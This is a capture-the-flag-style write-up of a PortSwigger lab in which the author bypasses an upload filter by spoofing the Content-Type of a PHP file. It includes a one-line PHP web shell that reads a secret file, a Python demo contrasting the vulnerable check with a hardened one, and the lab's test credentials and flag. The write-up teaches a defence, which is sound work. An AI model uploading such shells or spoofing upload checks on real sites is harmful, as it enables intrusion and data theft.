apsyleg · 1 min read
#portswigger #file-upload #rce #web-security
Web Shell Upload via Content-Type Restriction Bypass
Lab
Web shell upload via Content-Type restriction bypass · Apprentice
Solution
Given
This lab contains a vulnerable image upload function. It attempts to prevent users
from uploading unexpected file types, but relies on checking user-controllable
input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the
contents of the file /home/carlos/secret. Submit this secret using the button
provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Analysis and recon
The server seems to look only at the Content-Type line of the file part inside the multipart body, which is just another client-supplied value. It doesn't check the actual file contents or the extension. So we'll find the avatar upload request in Proxy history, send it to Repeater, and change that one line while keeping the .php filename.
Same shell as the previous lab:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Server response:
Sorry, file type application/x-php is not allowed
Only image/jpeg and image/png are allowed
Sorry, there was an error uploading your file.
Okay, let's try one of the allowed ones :) Changing the part's Content-Type to image/jpeg, with the filename still shell.php and the PHP body untouched, went through. Because the extension was never checked, the file is stored as shell.php and the server will execute it on request.
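To make the check concrete, here is an added Python example (my own, not the lab's code or the author's). It builds the multipart upload Burp shows for this request, parses it the way a server would, and then runs the file through two checks: the lab's, which trusts the part's Content-Type, and a hardened one that ignores that line and decides from an allow-listed extension plus the file's magic bytes. The field name avatar, the boundary format and the sample payloads are assumptions.

```python
import re
import uuid
from os.path import splitext

# Constructed sample payload: the same shell the writeup uploads.
PHP_SHELL = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
# Constructed minimal PNG (signature plus the start of the IHDR chunk),
# enough to satisfy a magic-bytes check.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR"

ALLOWED_TYPES = {"image/jpeg", "image/png"}
EXT_TO_TYPE = {".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".png": "image/png"}
MAGIC = {"image/jpeg": b"\xff\xd8\xff", "image/png": b"\x89PNG\r\n\x1a\n"}


def build_upload(filename, content_type, data, boundary=None):
    """Build the multipart/form-data body for the avatar upload.
    The field name 'avatar' is assumed. The part's Content-Type line is
    the attacker-controlled value the lab trusts."""
    boundary = boundary or "----WebKitFormBoundary" + uuid.uuid4().hex[:16]
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="avatar"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    body = head + data + f"\r\n--{boundary}--\r\n".encode()
    headers = {"Content-Type": f"multipart/form-data; boundary={boundary}"}
    return headers, body


def parse_multipart(headers, body):
    """Minimal server-side multipart parser; returns one dict per part."""
    boundary = re.search(r"boundary=([^;]+)", headers["Content-Type"]).group(1).encode()
    parts = []
    for chunk in body.split(b"--" + boundary):
        if chunk in (b"", b"--", b"--\r\n"):  # preamble or closing delimiter
            continue
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):  # CRLF that precedes the next delimiter
            data = data[:-2]
        fields = {}
        for line in head.decode("latin-1").strip().split("\r\n"):
            key, _, value = line.partition(":")
            fields[key.strip().lower()] = value.strip()
        m = re.search(r'filename="([^"]*)"', fields.get("content-disposition", ""))
        parts.append({
            "filename": m.group(1) if m else "",
            "content_type": fields.get("content-type", "application/octet-stream"),
            "data": data,
        })
    return parts


def vulnerable_check(part):
    """What the lab does: trust the declared Content-Type of the part."""
    if part["content_type"] not in ALLOWED_TYPES:
        return False, (f"Sorry, file type {part['content_type']} is not allowed\n"
                       "Only image/jpeg and image/png are allowed")
    return True, "ok"


def hardened_check(part):
    """Decide only from what the server can verify: an allow-listed
    extension and the file's own magic bytes. The declared Content-Type
    is ignored entirely, so spoofing it buys nothing."""
    ext = splitext(part["filename"])[1].lower()
    if ext not in EXT_TO_TYPE:
        return False, f"extension {ext!r} not allowed"
    expected = EXT_TO_TYPE[ext]
    if not part["data"].startswith(MAGIC[expected]):
        return False, f"content is not a {expected} image"
    return True, "ok"


if __name__ == "__main__":
    attempts = [
        ("shell.php", "application/x-php", PHP_SHELL),  # rejected by the lab
        ("shell.php", "image/jpeg", PHP_SHELL),         # the bypass
        ("avatar.png", "image/png", FAKE_PNG),          # a legitimate upload
    ]
    for name, ctype, data in attempts:
        part = parse_multipart(*build_upload(name, ctype, data))[0]
        print(f"{name} as {ctype}: vulnerable={vulnerable_check(part)[0]} "
              f"hardened={hardened_check(part)[0]}")
```

To send the crafted body for real you would pass `headers` and `body` to `requests.post(url, headers=headers, data=body, cookies=...)` with the logged-in session cookie and whatever CSRF token the form carries; those are lab details the block does not reproduce. Note that the hardened check still only accepts images by extension and signature; serving uploads from a directory where the web server does not execute scripts is the other half of a real fix.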
Trigger the shell by requesting the uploaded file directly:
https://0afc00240467710b80c4f3e900760037.web-security-academy.net/files/avatars/shell.php
The response body is the secret:
nwBgzpEyfEbf0QPqvGNb4sCrrAyLNvmC
Lab solved!